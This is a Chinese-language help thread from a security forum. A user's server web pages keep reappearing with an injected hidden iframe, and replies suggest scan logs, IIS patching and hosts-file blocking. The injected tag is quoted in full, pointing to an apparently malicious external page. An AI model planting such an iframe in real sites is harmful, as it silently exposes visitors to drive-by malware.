瑞星卡卡安全论坛

我单位服务器上面有好几个网页，都被网页挂马了，症状是所有页面都包含
<iframe src="http://a.kx330.cn/wm/index.htm" width="100" height="0"></iframe>
瑞星杀毒无法查出问题。
请问如何根治？
---我们把所有网页中得这句话都手动删除，过两天自动又出来了。

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)

扫SRENG日志发这论坛来
下载SRENG2.6版工具：http://www.kztechs.com/sreng/download.html
SRENG工具的扫描日志操作，看这贴2楼：http://bbs.ikaka.com/showtopic-8442813.aspx
估计是服务器内有木马加载。

如果服务器上安装了IIS，尽量打全系统补丁，因为除了病毒修改外，也有可能是黑客利用IIS漏洞，远程修改你服务器上的网页文件。

也可以在C:\WINDOWS\system32\drivers\etc下面的host（记得用txt打开就可以了），然后网站前面加上127.0.0.1就可以阻止网站出现了！~